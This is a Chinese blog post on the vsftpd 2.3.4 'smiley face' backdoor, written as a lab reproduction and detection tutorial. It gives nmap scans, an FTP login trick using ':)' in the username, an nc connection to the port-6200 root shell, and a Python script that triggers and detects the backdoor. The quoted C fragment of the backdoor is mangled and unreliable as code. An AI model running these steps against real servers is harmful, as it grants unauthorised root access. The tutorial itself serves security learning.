python检测笑脸漏洞

最新推荐文章于 2024-10-28 09:23:54 发布
最新推荐文章于 2024-10-28 09:23:54 发布
阅读量367 收藏 10
点赞数 4
分类专栏: 网络渗透 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Sxd2395381864/article/details/143237993
版权

一、漏洞介绍

VSFTPD 2.3.4,俗称笑脸漏洞。在VSFTPD的实现代码中存在一个后门函数,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。

{
    return 1;
{
else if((p_str->p_buf==0x3a)&&(p_str->p_buf+1==0x29))
{
vsf_sysutil_extra();
}
}
return 0;
}

 0x3a,0x29转换为ascii码刚好为:)(像简单的一个笑脸表情)

vsf_sysutil_extra()   :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入服务器,高危!!!!

二 、复现笑脸漏洞

将自己的攻击机与靶机用nat模式连接到同一子网下

先在kali用ifconfig得到自己的IP地址

用nmap扫描得到靶机IP

nmap -sV 192.168.48.0/24

可以看到靶机开启了21端口且版本为vsftpd 2.3.4

用nc连接到靶机的21端口

用户名输入带:)就好了,密码随便输

查看端口开放情况

nmap -Pn -p6200 192.168.48.132

可以看到6200端口开放了

nc连接该端口

输入ls成功看到当前目录下文件

python检测脚本为

import socket
from ftplib import FTP
host_ip = "192.168.48.132"  # 要检测的IP地址
ftp = FTP()
backdoorstr = "Hello:)"   # 账号
backdoorpass = 'me'       # 密码
try:
    ftp.connect(host_ip, 21, timeout=2)   # 发送请求给IP下的21端口
    ftp.login(backdoorstr, backdoorpass)      # 进行登录
except:
    print("完成")
try:
    s = socket.socket()         # 检测是否有漏洞存在
    nock = s.connect((host_ip, 6200))    # 发送请求给6200端口
    print("存在笑脸漏洞")
except:
    print("未找到")

在kali终端运行

Ftp笑脸漏洞复现(后门漏洞
qq_55857040的博客
12-13 6037
目录 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞 实验环境: 实验准备 实验过程 小总结 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的...
Python笑脸漏洞检测
xxx660308201的博客
10-25 522
笑脸漏洞(Smile vulnerability)是开发者在软件中留下的后门漏洞,VSFTPD 2.3.4版本中存在的笑脸漏洞尤为著名,它允许一个未知的入侵者通过特定的用户名和密码组合进入核心代码,从而获取管理员权限。当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞
:)笑脸漏洞
m0_62314360的博客
12-14 3632
VSFTPD v2.3.4 著名笑脸漏洞手工利用 Backdoor Command Execution:该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 打开Kali和靶机metasploitable2,在Kali中输入 netdiscover -r ip 来查看同一网段的靶机的ip 可以知道靶机的IP为192.168.38.132 输入.
笑脸:)漏洞
xujing19920814的博客
10-01 301
笑脸漏洞
笑脸漏洞(VSFTPD2.3.4)复现
aarong的博客
11-01 9909
笑脸漏洞(VSFTPD2.3.4)复现 漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。 攻击机:kali linux 靶机:Metasploitable2 复现过程 Nmap扫描同网断的靶机,观察靶机上的服务开放情况: nmap 192.168.43.0/24 发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4
笑脸漏洞(VSFTP2.3.4)复现
dgjkkhcf的博客
07-24 5421
在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root
Python脚本检测笑脸漏洞
T_Fire_of_Square的博客
10-23 343
​ vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“😃 ”,密码任意,因此也称为笑脸漏洞
利用 Poc Python 脚本检测 Metasploitable2 中的笑脸漏洞
最新发布
Tom_9471的博客
10-28 599
采用 POC Python 脚本检测 Metasploitable2 中 VSFTPD v2.3.4 存在的笑脸漏洞
检测笑脸漏洞是否存在的代码python
10-17
Python检测笑脸(Smile Detection)漏洞通常不是指检查代码中的错误,而是可能涉及到图像处理中的一个常见任务,比如使用OpenCV库来识别图片中的人脸并分析表情。下面是一个简单的例子,展示如何使用dlib库来...
Python脚本检测笑脸漏洞+笑脸漏洞(VSFTPD2.3.4)复现
moshiyum的博客
10-16 309
是一个已知存在漏洞的FTP服务器版本。该漏洞允许通过某种方式向服务器发送恶意代码来开启后门。使用nmap工具,这是我的ip,来进行扫描Metasploitable2的ip。打开kali root模式 输入ipconfig查看自己的ip。首先先安装好Metasploitable2靶机。可以看到21端口版本是VSFTPD2.3.4。在Metasploitable2的环境中,这时候启动我们的脚本来检测是否存在笑脸漏洞。这个开放的端口非常多,一看就是测试靶机。用nc命令链接到对应的端口。那同时进行这个漏洞的复现。
vsftpd 2.3.4 带漏洞版本 可复现
09-26
vsftpd 2.3.4 带笑脸漏洞版本 可复现
笑脸漏洞(vsftpd 2.3.4)
qq_52321992的博客
07-12 1287
VSFTPD(Very Secure FTP Daemon)是一个常用的FTP服务器软件。“vsftpd 2.3.4 Backdoor”(也称为 “vsFTPd 2.3.4 Backdoor” 或 “vsftpd v2.3.4 backdoor”)。该漏洞最初于2011年被公开发现,影响了VSFTPD 2.3.4版本。这个版本中的一个后门(backdoor)允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。
漏洞扫描(笑脸漏洞
zzzrrrppp的博客
11-21 3690
先查看自己的网段。扫描本网段是存活的主机。 发现Metasploitable2-Linux靶机。 查看ftp服务的版本。vsftpd 2.3.4 ·利用笑脸漏洞链接6200端口。
FTP笑脸漏洞
weixin_44237647的博客
01-29 3861
首先保证虚03拟机,kali虚拟机,metasploitable虚拟机主机相互ping的通。 FTP是C/S的模式。位于网络传输协议的应用层,21号端口通信。 03 ip 192.168.10.128 metasploitable ip 192.168.10.129 (简称meta) kali ip 192.168.10.133 主机 ip 192.168.1.4 FTP在03,meta上搭建。 ...
笑脸漏洞复现
qq_62623325的博客
11-24 922
笑脸漏洞复现
笑脸漏洞利用
m0_51617352的博客
12-15 3151
靶机metasploit :192.168.153.132 使用nmap对靶机进行信息收集 这里可以看到21端口是开放的,版本是vsftpd2.3.4,所以笑脸漏洞是存在的 直接ftp连接靶机 用户名:user:) 密码随便填写 这时靶机的6200端口会开启 接下来用nc连接即可 最后直接可以获取root权限了 原文链接:https://blog.youkuaiyun.com/m0_62210217/article/details/121085654 ...
笑脸漏洞—的简单操作
qq_53639387的博客
11-11 2581
1.首先我们需要在我们的虚拟机上安装Metasploitable2虚拟系统。 进去的虚拟系统启动之后,使用用户名msfadmin,和密码msfadmin登陆 2.接下来我们需要查看IP地址,使用ifconfig命令执行 3.知道了靶机上IP,接下来在kali端打开Metasploitable2,使用nmap 靶机IP地址扫描 4. ...
JumpServer远程代码执行漏洞Python检测与利用
综合以上信息,Jumpserver-EXP是一个为安全研究人员、网络安全专家提供的用于检测和利用JumpServer远程代码执行漏洞Python脚本工具。在使用该脚本进行任何操作之前,用户应当确保自己有足够的权限,并对目标系统的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值